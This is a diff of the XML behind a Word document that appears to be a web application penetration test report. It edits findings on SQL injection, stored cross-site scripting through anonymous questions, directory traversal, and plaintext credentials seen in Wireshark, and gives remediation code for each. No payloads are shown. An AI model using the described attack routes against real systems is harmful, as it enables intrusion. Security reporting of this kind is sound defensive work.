-          <w:hyperlink w:anchor="_Toc71399661" w:history="1">
+          <w:hyperlink w:anchor="_Toc71451233" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4300,7 +4404,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71399661 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71451233 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4345,7 +4449,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71399662" w:history="1">
+          <w:hyperlink w:anchor="_Toc71451234" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4372,7 +4476,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71399662 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71451234 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4417,7 +4521,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71399663" w:history="1">
+          <w:hyperlink w:anchor="_Toc71451235" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4445,7 +4549,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71399663 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71451235 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4490,7 +4594,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71399664" w:history="1">
+          <w:hyperlink w:anchor="_Toc71451236" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4518,7 +4622,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71399664 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71451236 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4563,7 +4667,7 @@
               <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc71399665" w:history="1">
+          <w:hyperlink w:anchor="_Toc71451237" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4591,7 +4695,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc71399665 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc71451237 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4648,7 +4752,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc71399617"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc71451189"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Summary of Findings</w:t>
@@ -5251,13 +5355,10 @@
               <w:t xml:space="preserve"> vulnerability present in the</w:t>
             </w:r>
             <w:r>
+              <w:t xml:space="preserve"> training lookup</w:t>
+            </w:r>
+            <w:r>
               <w:t xml:space="preserve"> API</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> for traini</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ngs</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5272,7 +5373,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc71399618"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc71451190"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Detailed Findings</w:t>
@@ -5290,7 +5391,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc71399619"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc71451191"/>
       <w:r>
         <w:t xml:space="preserve">Finding 1 - </w:t>
       </w:r>
@@ -5345,7 +5446,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="4" w:name="_Toc71399620"/>
+            <w:bookmarkStart w:id="4" w:name="_Toc71451192"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5676,7 +5777,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="5" w:name="_Proof_of_Concept"/>
-            <w:bookmarkStart w:id="6" w:name="_Toc71399621"/>
+            <w:bookmarkStart w:id="6" w:name="_Toc71451193"/>
             <w:bookmarkEnd w:id="5"/>
             <w:r>
               <w:rPr>
@@ -5836,7 +5937,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="7" w:name="_Toc71399622"/>
+            <w:bookmarkStart w:id="7" w:name="_Toc71451194"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -5925,7 +6026,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="8" w:name="_Toc71399623"/>
+            <w:bookmarkStart w:id="8" w:name="_Toc71451195"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6021,7 +6122,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="9" w:name="_Toc71399624"/>
+            <w:bookmarkStart w:id="9" w:name="_Toc71451196"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6124,7 +6225,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="10" w:name="_Toc71399625"/>
+            <w:bookmarkStart w:id="10" w:name="_Toc71451197"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6211,7 +6312,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="11" w:name="_Toc71399626"/>
+            <w:bookmarkStart w:id="11" w:name="_Toc71451198"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6316,7 +6417,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt = $con-&gt;prepare("SELECT * FROM Users WHERE username = ?");</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = $con-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>prepare(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"SELECT * FROM Users WHERE username = ?");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6344,7 +6481,61 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;bind_param("s", $_GET["username"]);</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>bind_</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>param</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>"s", $_GET["username"]);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6372,7 +6563,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;execute();</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>execute(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6400,7 +6627,43 @@
                 <w:sz w:val="18"/>
                 <w:szCs w:val="18"/>
               </w:rPr>
-              <w:t>$stmt-&gt;close();</w:t>
+              <w:t>$</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>stmt</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>-&gt;</w:t>
+            </w:r>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>close(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6471,7 +6734,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc71399627"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc71451199"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 2 - </w:t>
@@ -6521,7 +6784,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="13" w:name="_Toc71399628"/>
+            <w:bookmarkStart w:id="13" w:name="_Toc71451200"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -6635,13 +6898,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> can inject arbitrary code into the database </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">and when the code is triggered, unauthorised actions with elevated privileges could be performed </w:t>
+              <w:t xml:space="preserve"> can inject arbitrary code into the database</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>. W</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">hen the code is triggered, unauthorised actions with elevated privileges could be performed </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6653,7 +6922,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> admin users.</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">the </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>admin users.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6761,7 +7042,7 @@
               </w:rPr>
             </w:pPr>
             <w:bookmarkStart w:id="14" w:name="_Proof_of_Concept_1"/>
-            <w:bookmarkStart w:id="15" w:name="_Toc71399629"/>
+            <w:bookmarkStart w:id="15" w:name="_Toc71451201"/>
             <w:bookmarkEnd w:id="14"/>
             <w:r>
               <w:rPr>
@@ -6809,7 +7090,19 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>his vulnerability can be exploited by submitting malicious code entered as anonymous question.</w:t>
+              <w:t>his vulnerability can be exploited by submitting malicious code as</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> an</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> anonymous question.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6833,7 +7126,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> to open up that malicious anonymous question.</w:t>
+              <w:t xml:space="preserve"> to open up that question.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6901,7 +7194,13 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> since in this case the code </w:t>
+              <w:t xml:space="preserve"> [1]</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> since the code </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6931,7 +7230,13 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> [1]. See </w:t>
+              <w:t xml:space="preserve"> in this case</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">. See </w:t>
             </w:r>
             <w:hyperlink w:anchor="_Exploitation_2" w:history="1">
               <w:r>
@@ -6965,7 +7270,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="16" w:name="_Toc71399630"/>
+            <w:bookmarkStart w:id="16" w:name="_Toc71451202"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7029,7 +7334,19 @@
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve">can perform unauthorised action on behalf of HR team members and fetch files from the server. </w:t>
+              <w:t xml:space="preserve">can perform unauthorised action on behalf of HR team members and fetch files </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>on</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> the server. </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7088,7 +7405,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="17" w:name="_Toc71399631"/>
+            <w:bookmarkStart w:id="17" w:name="_Toc71451203"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7148,7 +7465,31 @@
               <w:rPr>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Inputs in web applications are the most likely to be exploited by attackers while exploiting this vulnerability requires the attacker to have a set of login credentials. Therefore, the overall likelihood is said to be possible.</w:t>
+              <w:t>Inputs in web applications are the most likely</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> places</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> to be exploited by attackers</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> while exploiting this vulnerability requires the attacker to have a set of login credentials. Therefore, the overall likelihood is said to be possible.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7173,7 +7514,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="18" w:name="_Toc71399632"/>
+            <w:bookmarkStart w:id="18" w:name="_Toc71451204"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7248,7 +7589,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="19" w:name="_Toc71399633"/>
+            <w:bookmarkStart w:id="19" w:name="_Toc71451205"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7331,7 +7672,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="20" w:name="_Toc71399634"/>
+            <w:bookmarkStart w:id="20" w:name="_Toc71451206"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7406,7 +7747,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>$question = htmlentities($_POST["question"])</w:t>
+              <w:t xml:space="preserve">$question = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>htmlentities</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>($_POST["question"])</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7436,7 +7797,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc71399635"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc71451207"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding 3 - </w:t>
@@ -7486,7 +7847,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="22" w:name="_Toc71399636"/>
+            <w:bookmarkStart w:id="22" w:name="_Toc71451208"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7564,7 +7925,23 @@
                 <w:bCs/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>web validation</w:t>
+              <w:t>web</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>site</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> validation</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7688,7 +8065,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="23" w:name="_Toc71399637"/>
+            <w:bookmarkStart w:id="23" w:name="_Toc71451209"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7740,7 +8117,7 @@
               <w:t xml:space="preserve"> out the port</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve">, we can traverse the directory and eventually leaks out the sensitive information. For a detailed walkthrough, see </w:t>
+              <w:t xml:space="preserve">, we can traverse the directory and eventually leak out the sensitive information. For a detailed walkthrough, see </w:t>
             </w:r>
             <w:hyperlink w:anchor="_Section_3_–" w:history="1">
               <w:r>
@@ -7775,7 +8152,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="24" w:name="_Toc71399638"/>
+            <w:bookmarkStart w:id="24" w:name="_Toc71451210"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7851,7 +8228,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="25" w:name="_Toc71399639"/>
+            <w:bookmarkStart w:id="25" w:name="_Toc71451211"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -7957,7 +8334,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="26" w:name="_Toc71399640"/>
+            <w:bookmarkStart w:id="26" w:name="_Toc71451212"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8049,7 +8426,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="27" w:name="_Toc71399641"/>
+            <w:bookmarkStart w:id="27" w:name="_Toc71451213"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8180,7 +8557,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="28" w:name="_Toc71399642"/>
+            <w:bookmarkStart w:id="28" w:name="_Toc71451214"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8313,7 +8690,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc71399643"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc71451215"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Finding </w:t>
@@ -8369,7 +8746,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="30" w:name="_Toc71399644"/>
+            <w:bookmarkStart w:id="30" w:name="_Toc71451216"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8472,7 +8849,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="31" w:name="_Toc71399645"/>
+            <w:bookmarkStart w:id="31" w:name="_Toc71451217"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8565,7 +8942,31 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>This is a screenshot from Wireshark and we can see that the username and password are shown as plaintext at the bottom.</w:t>
+              <w:t>This is a screenshot</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> of one of the</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> transmitted</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> packets</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> from Wireshark and we can see that the username and password are shown as plaintext at the bottom.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8590,7 +8991,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="32" w:name="_Toc71399646"/>
+            <w:bookmarkStart w:id="32" w:name="_Toc71451218"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8705,13 +9106,13 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> more likely to exploited</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> hence at a higher risk</w:t>
+              <w:t xml:space="preserve"> more likely to exploite</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>d</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8742,7 +9143,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="33" w:name="_Toc71399647"/>
+            <w:bookmarkStart w:id="33" w:name="_Toc71451219"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8833,7 +9234,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="34" w:name="_Toc71399648"/>
+            <w:bookmarkStart w:id="34" w:name="_Toc71451220"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -8921,7 +9322,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="35" w:name="_Toc71399649"/>
+            <w:bookmarkStart w:id="35" w:name="_Toc71451221"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9054,7 +9455,7 @@
                 <w:b/>
               </w:rPr>
             </w:pPr>
-            <w:bookmarkStart w:id="36" w:name="_Toc71399650"/>
+            <w:bookmarkStart w:id="36" w:name="_Toc71451222"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -9156,6 +9557,7 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -9163,7 +9565,37 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>LoadModule ssl_module modules/mod_ssl.so</w:t>
+              <w:t>LoadModule</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ssl_module</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> modules/mod_ssl.so</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9238,7 +9670,27 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>&lt;VirtualHost *:443&gt;</w:t>
